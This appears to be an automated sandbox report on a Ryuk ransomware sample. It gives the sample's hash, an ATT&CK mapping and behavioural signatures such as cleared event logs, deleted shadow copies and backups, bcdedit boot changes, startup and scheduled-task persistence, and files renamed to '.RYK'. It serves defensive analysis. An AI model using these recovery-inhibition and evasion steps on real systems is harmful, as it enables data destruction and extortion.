Malware Analysis Report

2024-08-06 09:27

Sample ID 220921-ze6ayshae5
Target ryuk.exe
SHA256 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
Tags
ryuk discovery evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

Threat Level: Known bad

The file ryuk.exe was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Modifies boot configuration data using bcdedit

Clears Windows event logs

Deletes shadow copies

Deletes backup catalog

Disables taskbar notifications via registry modification

Disables use of System Restore points

Disables Task Manager via registry modification

Drops startup file

Checks computer location settings

Modifies file permissions

Enumerates connected drives

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Views/modifies file attributes

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Runs net.exe

Opens file in notepad (likely ransom note)

Modifies registry class

Kills process with taskkill

Creates scheduled task(s)

MITRE ATT&CK Matrix V6

Initial Access
TA0001
Execution
TA0002
Command-Line Interface
T1059
Scheduled Task
T1053
Persistence
TA0003
Scheduled Task
T1053
Hidden Files and Directories
T1158
Privilege Escalation
TA0004
Scheduled Task
T1053
Defense Evasion
TA0005
Indicator Removal on Host
T1070
File Deletion
T1107
File Permissions Modification
T1222
Hidden Files and Directories
T1158
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Inhibit System Recovery
T1490

Analysis: static1

Detonation Overview

Reported

2022-09-21 20:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-21 20:38

Reported

2022-09-21 20:49

Platform

win7-20220812-en

Max time kernel

582s

Max time network

566s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"

Signatures

Ryuk

ransomware ryuk

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables taskbar notifications via registry modification

evasion

Disables use of System Restore points

evasion

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\QuizShow.potx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03464_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03513_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ps.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\BLUEPRNT.ELM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00118_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212685.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ADRESPEL.POC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\MS.WPG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RESUME.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PRRTINST.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21377_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN109.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sitka.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\St_Johns.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Matamoros.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\WPGIMP32.FLT.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105376.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00458_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0172193.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00810_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00668_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSYUBIN7.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS_K_COL.HXK.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WPEQU532.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00168_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18232_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Library\EUROTOOL.XLAM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01180_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ExecutiveResume.dotx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pohnpei.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198377.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\EXP_XPS.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENVELOPE.DPV.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl C:\Windows\system32\wbadmin.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
